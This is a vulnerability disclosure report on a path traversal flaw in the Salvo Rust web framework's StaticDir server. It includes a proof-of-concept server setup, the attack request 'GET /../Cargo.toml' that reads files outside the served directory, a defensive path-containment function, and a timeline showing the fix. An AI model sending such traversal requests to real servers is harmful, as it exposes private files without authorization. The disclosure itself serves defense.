Relative Path Traversal vulnerability in StaticDir server in salvo-rs/salvo


Reported on Apr 17th 2022


There is a relative path traversal vulnerability in the serve module of the extra crate. An attacker can simply request a relative path containing `..` segments and read files outside of the configured directory root.

Proof of Concept

With a static folder in the project directory:

use salvo::extra::serve::{Options, StaticDir};
use salvo::prelude::*;

#[tokio::main]
async fn main() {
    // Serve the project's ./static directory for any request path.
    let router = Router::with_path("<**path>")
        .get(StaticDir::width_options(vec!["static"], Options::default()));
    // Listener and bind address added to complete the snippet (assumed, as in Salvo's examples).
    Server::new(TcpListener::bind("127.0.0.1:7878")).serve(router).await;
}


Example attack request:

GET /../Cargo.toml HTTP/1.1
Host: localhost

This serves the Cargo.toml file in the project directory, which is outside the static directory: the `..` segment is resolved against the root instead of being rejected.
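As an added defender's example, not part of this report or of Salvo's own fix, here is the lexical containment check a static file handler should apply to the (already percent-decoded) request path before touching the filesystem; `resolve_within_root`, the `static` root and the sample requests are assumptions:

```rust
use std::path::{Component, Path, PathBuf};

/// Lexically resolve `request_path` against `root`, returning `None` if any
/// `..` would climb above `root`. Run this on the percent-decoded path
/// (decoding after the check would let `%2e%2e` slip through). It does not
/// follow symlinks; a link inside `root` that points outside remains reachable.
pub fn resolve_within_root(root: &Path, request_path: &str) -> Option<PathBuf> {
    let mut rel = PathBuf::new();
    for comp in Path::new(request_path).components() {
        match comp {
            Component::Normal(seg) => rel.push(seg),
            // Leading "/" and "." segments carry no directory change.
            Component::CurDir | Component::RootDir => {}
            Component::ParentDir => {
                // Popping an empty stack means the request tried to leave `root`.
                if !rel.pop() {
                    return None;
                }
            }
            // Drive prefixes (Windows) are never acceptable in a URL path.
            Component::Prefix(_) => return None,
        }
    }
    if rel.as_os_str().is_empty() {
        return Some(root.to_path_buf());
    }
    Some(root.join(rel))
}

fn main() {
    // Constructed sample requests, including the report's /../Cargo.toml.
    let root = Path::new("static");
    for req in ["/index.html", "/css/../app.js", "/../Cargo.toml", "/a/../../x"] {
        match resolve_within_root(root, req) {
            Some(p) => println!("{req:<16} -> serve {}", p.display()),
            None => println!("{req:<16} -> reject, escapes root"),
        }
    }
}
```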


This vulnerability is capable of exposing any file on the server that the Salvo process can read.

We are processing your report and will contact the salvo-rs/salvo team within 24 hours. (a year ago)
We created a GitHub Issue asking the maintainers to create a (a year ago)
We have contacted a member of the salvo-rs/salvo team and are waiting to hear back (a year ago)
salvo-rs/salvo maintainer (a year ago):

Thanks for your work, I have published a new version to fix this issue.

salvo-rs/salvo maintainer validated this vulnerability (a year ago)
William Henderson has been awarded the disclosure bounty
The fix bounty is now up for grabs
salvo-rs/salvo maintainer marked this as fixed in 0.19.1 with commit 54815c (a year ago)
The fix bounty has been dropped
This vulnerability will not receive a CVE